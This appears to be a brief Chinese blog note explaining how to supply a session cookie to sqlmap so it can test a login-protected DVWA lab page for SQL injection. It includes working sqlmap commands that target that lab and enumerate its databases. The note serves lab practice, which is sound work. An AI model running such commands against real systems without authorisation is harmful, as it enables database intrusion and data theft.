SQLMAP针对需要web登录认证后,检测是否存在注入时的解决方法?

 这里记录下解决方法,之前遇到过,没记笔记,很久没用,又忘了。可以通过 --cookie 进行解决此问题

在使用sqlmap检测注入点时,会报未进行登录的错误,这里是自己搭建的测试环境,是肯定存在注入点的
使用正常语句,会报未登录错误。

sqlmap -u "http://XXX.XXX.XXX.13:8082/DVWA-master/vulnerabilities/sqli/?id=1" --dbs

提示需要登录认证

SQLMAP针对需要web登录认证后,检测是否存在注入时的解决方法?_第1张图片

sqlmap -u "http://XXX.XXX.XX.13:8082/DVWA-master/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=2dbb32h4s1k8aqotrn0evtnpq2" --dbs

未报错

SQLMAP针对需要web登录认证后,检测是否存在注入时的解决方法?_第2张图片

你可能感兴趣的:(SQLMAP)